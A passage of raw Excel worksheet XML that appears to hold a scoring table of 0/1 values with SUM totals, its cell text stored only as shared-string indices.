      </c>
      <c r="C31" s="3" t="s">
        <v>920</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>920</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>893</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>894</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>921</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>894</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>886</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>331</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>331</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>331</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>895</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>896</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>922</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>930</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>897</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>898</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>923</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>898</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>899</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>900</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>900</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>900</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>36</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>901</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>112</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>112</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>112</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>902</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>903</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>931</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>931</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>904</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>155</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>166</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>155</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>902</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>903</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>924</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>0</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>931</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B43" s="3"/>
      <c r="C43" s="3"/>
      <c r="F43" s="3"/>
    </row>
    <row r="44" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>906</v>
      </c>
      <c r="B44" s="3"/>
      <c r="C44" s="3"/>
      <c r="F44" s="3"/>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B45" s="3"/>
      <c r="C45" s="3"/>
      <c r="F45" s="3"/>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>907</v>
      </c>
      <c r="B46" s="3"/>
      <c r="C46" s="3"/>
      <c r="F46" s="3"/>
    </row>
    <row r="47" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B47" s="3"/>
      <c r="C47" s="3"/>
      <c r="F47" s="3"/>
    </row>
    <row r="48" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A48" s="3" t="s">
        <v>908</v>
      </c>
      <c r="B48" s="3"/>
      <c r="C48" s="3"/>
      <c r="F48" s="3"/>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B49" s="3"/>
      <c r="C49" s="3"/>
      <c r="F49" s="3"/>
    </row>
    <row r="50" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>791</v>
      </c>
      <c r="B50" s="3"/>
      <c r="C50" s="3"/>
      <c r="F50" s="3"/>
    </row>
    <row r="51" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A51" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B51" s="3"/>
      <c r="C51" s="3"/>
      <c r="F51" s="3"/>
    </row>
    <row r="52" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A52" s="3" t="s">
        <v>824</v>
      </c>
      <c r="B52" s="3"/>
      <c r="C52" s="3"/>
      <c r="F52" s="3"/>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B53" s="3"/>
      <c r="C53" s="3"/>
      <c r="F53" s="3"/>
    </row>
    <row r="54" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>909</v>
      </c>
      <c r="B54" s="3"/>
      <c r="C54" s="3"/>
      <c r="F54" s="3"/>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B55" s="3"/>
      <c r="C55" s="3"/>
      <c r="F55" s="3"/>
    </row>
    <row r="56" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>910</v>
      </c>
      <c r="B56" s="3"/>
      <c r="C56" s="3"/>
      <c r="F56" s="3"/>
    </row>
    <row r="57" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A57" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D57" s="6">
        <f>SUM(D4:D42)</f>
        <v>35</v>
      </c>
      <c r="E57" s="6">
        <f t="shared" ref="E57:H57" si="0">SUM(E4:E42)</f>
        <v>32</v>
      </c>
      <c r="F57" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G57" s="6">
        <f t="shared" si="0"/>
        <v>39</v>
      </c>
      <c r="H57" s="6">
        <f t="shared" si="0"/>
        <v>33</v>
      </c>
    </row>
    <row r="60" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A60" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B60" s="25"/>
      <c r="C60" s="25"/>
      <c r="D60" s="25"/>
      <c r="E60" s="25"/>
      <c r="F60" s="25"/>
      <c r="G60" s="25"/>
      <c r="H60" s="25"/>
    </row>
    <row r="61" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A61" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B61" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C61" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D61" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E61" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F61" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G61" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H61" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="62" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A62" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D62" s="20">
        <v>1</v>
      </c>
      <c r="E62" s="20">
        <v>1</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G62" s="19">
        <v>1</v>
      </c>
      <c r="H62" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A63" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D63" s="20">
        <v>1</v>
      </c>
      <c r="E63" s="20">
        <v>1</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G63" s="19">
        <v>1</v>
      </c>
      <c r="H63" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>1591</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="D64" s="20">
        <v>1</v>
      </c>
      <c r="E64" s="20">
        <v>0</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="G64" s="19">
        <v>1</v>
      </c>
      <c r="H64" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A65" s="3" t="s">
        <v>1548</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>1334</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>1928</v>
      </c>
      <c r="D65" s="20">
        <v>1</v>
      </c>
      <c r="E65" s="20">
        <v>0</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>1928</v>
      </c>
      <c r="G65" s="19">
        <v>1</v>
      </c>
      <c r="H65" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A66" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="D66" s="20">
        <v>1</v>
      </c>
      <c r="E66" s="20">
        <v>1</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G66" s="19">
        <v>1</v>
      </c>
      <c r="H66" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A67" s="3" t="s">
        <v>1382</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D67" s="20">
        <v>1</v>
      </c>
      <c r="E67" s="20">
        <v>1</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G67" s="19">
        <v>1</v>
      </c>
      <c r="H67" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="68" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A68" s="3"/>
      <c r="B68" s="3" t="s">
        <v>1805</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>1805</v>
      </c>
      <c r="D68" s="20">
        <v>1</v>
      </c>
      <c r="E68" s="20">
        <v>1</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>1805</v>
      </c>
      <c r="G68" s="19">
        <v>1</v>
      </c>
      <c r="H68" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A69" s="3"/>
      <c r="B69" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="D69" s="20">
        <v>1</v>
      </c>
      <c r="E69" s="20">
        <v>1</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="G69" s="19">
        <v>1</v>
      </c>
      <c r="H69" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A70" s="3"/>
      <c r="B70" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="D70" s="20">
        <v>1</v>
      </c>
      <c r="E70" s="20">
        <v>1</v>
      </c>
      <c r="F70" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="G70" s="19">
        <v>1</v>
      </c>
      <c r="H70" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A71" s="3" t="s">
        <v>1782</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="D71" s="20">
        <v>1</v>
      </c>
      <c r="E71" s="20">
        <v>1</v>
      </c>
      <c r="F71" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="G71" s="19">
        <v>1</v>
      </c>
      <c r="H71" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A72" s="3" t="s">
        <v>1723</v>
      </c>
      <c r="B72" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C72" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="D72" s="20">
        <v>1</v>
      </c>
      <c r="E72" s="20">
        <v>1</v>
      </c>
      <c r="F72" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="G72" s="19">
        <v>1</v>
      </c>
      <c r="H72" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="73" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A73" s="3" t="s">
        <v>1783</v>
      </c>
      <c r="B73" s="3" t="s">
        <v>1784</v>
      </c>
      <c r="C73" s="3" t="s">
        <v>1799</v>
      </c>
      <c r="D73" s="20">
        <v>1</v>
      </c>
      <c r="E73" s="20">
        <v>1</v>
      </c>
      <c r="F73" s="3" t="s">
        <v>1799</v>
      </c>
      <c r="G73" s="19">
        <v>1</v>
      </c>
      <c r="H73" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A74" s="3" t="s">
        <v>1785</v>
      </c>
      <c r="B74" s="3" t="s">
        <v>1786</v>
      </c>
      <c r="C74" s="3" t="s">
        <v>1800</v>
      </c>
      <c r="D74" s="20">
        <v>1</v>
      </c>
      <c r="E74" s="20">
        <v>1</v>
      </c>
      <c r="F74" s="3" t="s">
        <v>1800</v>
      </c>
      <c r="G74">
        <v>1</v>
      </c>
      <c r="H74">
        <v>1</v>
      </c>
    </row>
    <row r="75" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A75" s="3"/>
      <c r="B75" s="3" t="s">
        <v>1806</v>
      </c>
      <c r="C75" s="3" t="s">
        <v>1806</v>
      </c>
      <c r="D75" s="20">
        <v>1</v>
      </c>
      <c r="E75" s="20">
        <v>1</v>
      </c>
      <c r="F75" s="3" t="s">
        <v>1806</v>
      </c>
      <c r="G75" s="19">
        <v>1</v>
      </c>
      <c r="H75" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="76" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A76" s="3" t="s">
        <v>1787</v>
      </c>
      <c r="B76" s="3" t="s">
        <v>1589</v>
      </c>
      <c r="C76" s="3" t="s">
        <v>1589</v>
      </c>
      <c r="D76" s="20">
        <v>1</v>
      </c>
      <c r="E76" s="20">
        <v>1</v>
      </c>
      <c r="F76" s="3" t="s">
        <v>1589</v>
      </c>
      <c r="G76">
        <v>1</v>
      </c>
      <c r="H76">
        <v>1</v>
      </c>
    </row>
    <row r="77" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A77" s="3" t="s">
        <v>1788</v>
      </c>
      <c r="B77" s="3" t="s">
        <v>1789</v>
      </c>
      <c r="C77" s="3" t="s">
        <v>1801</v>
      </c>
      <c r="D77" s="20">
        <v>1</v>
      </c>
      <c r="E77" s="20">
        <v>1</v>
      </c>
      <c r="F77" s="3" t="s">
        <v>1801</v>
      </c>
      <c r="G77">
        <v>1</v>
      </c>
      <c r="H77">
        <v>1</v>
      </c>
    </row>
    <row r="78" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A78" s="3" t="s">
        <v>1790</v>
      </c>
      <c r="B78" s="3" t="s">
        <v>1791</v>
      </c>
      <c r="C78" s="3" t="s">
        <v>1802</v>
      </c>
      <c r="D78" s="20">
        <v>1</v>
      </c>
      <c r="E78" s="20">
        <v>1</v>
      </c>
      <c r="F78" s="3" t="s">
        <v>1802</v>
      </c>
      <c r="G78">
        <v>1</v>
      </c>
      <c r="H78">
        <v>1</v>
      </c>
    </row>
    <row r="79" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A79" s="3" t="s">
        <v>1792</v>
      </c>
      <c r="B79" s="3" t="s">
        <v>1793</v>
      </c>
      <c r="C79" s="3" t="s">
        <v>1927</v>
      </c>
      <c r="D79" s="20">
        <v>0</v>
      </c>
      <c r="E79" s="20">
        <v>0</v>
      </c>
      <c r="F79" s="3" t="s">
        <v>1927</v>
      </c>
      <c r="G79">
        <v>0</v>
      </c>
      <c r="H79">
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A80" s="3" t="s">
        <v>1794</v>
      </c>
      <c r="B80" s="3" t="s">
        <v>1795</v>
      </c>
      <c r="C80" s="3" t="s">
        <v>1803</v>
      </c>
      <c r="D80" s="20">
        <v>1</v>
      </c>
      <c r="E80" s="20">
        <v>1</v>
      </c>
      <c r="F80" s="3" t="s">
        <v>1803</v>
      </c>
      <c r="G80">
        <v>1</v>
      </c>
      <c r="H80">
        <v>1</v>
      </c>
    </row>
    <row r="81" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A81" s="3" t="s">
        <v>1796</v>
      </c>
      <c r="B81" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="C81" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="D81" s="20">
        <v>1</v>
      </c>
      <c r="E81" s="20">
        <v>1</v>
      </c>
      <c r="F81" s="3" t="s">
        <v>1118</v>
      </c>
      <c r="G81">
        <v>1</v>
      </c>
      <c r="H81">
        <v>1</v>
      </c>
    </row>
    <row r="82" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A82" s="3" t="s">
        <v>1479</v>
      </c>
      <c r="B82" s="3" t="s">
        <v>71</v>
      </c>
      <c r="C82" s="3" t="s">
        <v>71</v>
      </c>
      <c r="D82" s="20">
        <v>1</v>
      </c>
      <c r="E82" s="20">
        <v>1</v>
      </c>
      <c r="F82" s="3" t="s">
        <v>71</v>
      </c>
      <c r="G82">
        <v>1</v>
      </c>
      <c r="H82">
        <v>1</v>
      </c>
    </row>
    <row r="83" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A83" s="3" t="s">
        <v>1573</v>
      </c>
      <c r="B83" s="3" t="s">
        <v>1055</v>
      </c>
      <c r="C83" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="D83" s="20">
        <v>1</v>
      </c>
      <c r="E83" s="20">
        <v>1</v>
      </c>
      <c r="F83" s="3" t="s">
        <v>1080</v>
      </c>
      <c r="G83">
        <v>1</v>
      </c>
      <c r="H83">
        <v>1</v>
      </c>
    </row>
    <row r="84" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A84" s="3" t="s">
        <v>1056</v>
      </c>
      <c r="B84" s="3" t="s">
        <v>73</v>
      </c>
      <c r="C84" s="3" t="s">
        <v>73</v>
      </c>
      <c r="D84" s="20">
        <v>1</v>
      </c>
      <c r="E84" s="20">
        <v>1</v>
      </c>
      <c r="F84" s="3" t="s">
        <v>73</v>
      </c>
      <c r="G84">
        <v>1</v>
      </c>
      <c r="H84">
        <v>1</v>
      </c>
    </row>
    <row r="85" spans="1:8" ht="165.6" x14ac:dyDescent="0.25">
      <c r="A85" s="3" t="s">
        <v>1797</v>
      </c>
      <c r="B85" s="3" t="s">
        <v>1798</v>
      </c>
      <c r="C85" s="3" t="s">
        <v>1804</v>
      </c>
      <c r="D85" s="20">
        <v>0</v>
      </c>
      <c r="E85" s="20">
        <v>0</v>
      </c>
      <c r="F85" s="3" t="s">
        <v>1804</v>
      </c>
      <c r="G85">
        <v>0</v>
      </c>
      <c r="H85">
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A86" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D86" s="6">
        <f>SUM(D62:D85)</f>
        <v>22</v>
      </c>
      <c r="E86" s="6">
        <f t="shared" ref="E86:H86" si="1">SUM(E62:E85)</f>
        <v>20</v>
      </c>
      <c r="F86" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G86" s="6">
        <f t="shared" si="1"/>
        <v>22</v>
      </c>
      <c r="H86" s="6">
        <f t="shared" si="1"/>
        <v>20</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A60:H60"/>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B4B-BF89-4E79-B179-1A5C3A92942F}">
  <dimension ref="A1:I66"/>
  <sheetViews>
    <sheetView topLeftCell="A52" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="I65" sqref="I65"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="24.5546875" customWidth="1"/>
    <col min="2" max="2" width="19.88671875" customWidth="1"/>
    <col min="3" max="3" width="20.33203125" customWidth="1"/>
    <col min="4" max="4" width="10.44140625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="10.6640625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="15.77734375" customWidth="1"/>
    <col min="7" max="7" width="10.44140625" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="10.6640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="20.399999999999999" x14ac:dyDescent="0.25">
      <c r="A1" s="21" t="s">
        <v>120</v>
      </c>
      <c r="B1" s="22"/>
      <c r="C1" s="22"/>
      <c r="D1" s="22"/>
      <c r="E1" s="22"/>
      <c r="F1" s="22"/>
      <c r="G1" s="22"/>
      <c r="H1" s="22"/>
    </row>
    <row r="2" spans="1:9" ht="25.2" x14ac:dyDescent="0.25">
      <c r="A2" s="28" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="28"/>
      <c r="C2" s="28"/>
      <c r="D2" s="28"/>
      <c r="E2" s="28"/>
      <c r="F2" s="28"/>
      <c r="G2" s="28"/>
      <c r="H2" s="28"/>
    </row>
    <row r="3" spans="1:9" ht="39.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A3" s="10" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="10" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="10" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="10" t="s">
        <v>5</v>
      </c>
      <c r="E3" s="10" t="s">
        <v>6</v>
      </c>
      <c r="F3" s="10" t="s">
        <v>4</v>
      </c>
      <c r="G3" s="10" t="s">
        <v>5</v>
      </c>
      <c r="H3" s="10" t="s">
        <v>6</v>
      </c>
      <c r="I3" s="3"/>
    </row>
    <row r="4" spans="1:9" ht="79.2" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A4" s="11" t="s">
        <v>104</v>
      </c>
      <c r="B4" s="12" t="s">
        <v>105</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>105</v>
      </c>
      <c r="D4" s="12">
        <v>1</v>
      </c>
      <c r="E4" s="12">
        <v>1</v>
      </c>
      <c r="F4" s="12" t="s">
        <v>103</v>
      </c>
      <c r="G4" s="12">
        <v>1</v>
      </c>
      <c r="H4" s="12">
        <v>1</v>
      </c>
      <c r="I4" s="3"/>
    </row>
    <row r="5" spans="1:9" ht="110.4" x14ac:dyDescent="0.25">
      <c r="A5" s="11" t="s">
        <v>87</v>
      </c>
      <c r="B5" s="12" t="s">
        <v>106</v>
      </c>
      <c r="C5" s="12" t="s">
        <v>106</v>
      </c>
      <c r="D5" s="12">
        <v>1</v>
      </c>
      <c r="E5" s="12">
        <v>1</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>106</v>
      </c>
      <c r="G5" s="12">
        <v>1</v>
      </c>
      <c r="H5" s="12">
        <v>1</v>
      </c>
      <c r="I5" s="3"/>
    </row>
    <row r="6" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A6" s="11" t="s">
        <v>8</v>
      </c>
      <c r="B6" s="12" t="s">
        <v>26</v>
      </c>
      <c r="C6" s="12" t="s">
        <v>26</v>
      </c>
      <c r="D6" s="12">
        <v>1</v>
      </c>
      <c r="E6" s="12">
        <v>1</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>26</v>
      </c>
      <c r="G6" s="12">
        <v>1</v>
      </c>
      <c r="H6" s="12">
        <v>1</v>
      </c>
      <c r="I6" s="3"/>
    </row>
    <row r="7" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A7" s="11" t="s">
        <v>79</v>
      </c>
      <c r="B7" s="12" t="s">
        <v>107</v>
      </c>
      <c r="C7" s="12" t="s">
        <v>107</v>
      </c>
      <c r="D7" s="12">
        <v>1</v>
      </c>
      <c r="E7" s="12">
        <v>1</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>107</v>
      </c>
      <c r="G7" s="12">
        <v>1</v>
      </c>
      <c r="H7" s="12">
        <v>1</v>
      </c>
      <c r="I7" s="3"/>
    </row>
    <row r="8" spans="1:9" ht="39.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A8" s="11" t="s">
        <v>88</v>
      </c>
      <c r="B8" s="12"/>
      <c r="C8" s="12"/>
      <c r="D8" s="12"/>
      <c r="E8" s="12"/>
      <c r="F8" s="12"/>
      <c r="G8" s="12"/>
      <c r="H8" s="12"/>
      <c r="I8" s="3"/>
    </row>
    <row r="9" spans="1:9" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A9" s="11" t="s">
        <v>89</v>
      </c>
      <c r="B9" s="12" t="s">
        <v>29</v>
      </c>
      <c r="C9" s="12" t="s">
        <v>30</v>
      </c>
      <c r="D9" s="12">
        <v>1</v>
      </c>
      <c r="E9" s="12">
        <v>1</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>30</v>
      </c>
      <c r="G9" s="12">
        <v>1</v>
      </c>
      <c r="H9" s="12">
        <v>1</v>
      </c>
      <c r="I9" s="3"/>
    </row>
    <row r="10" spans="1:9" x14ac:dyDescent="0.25">
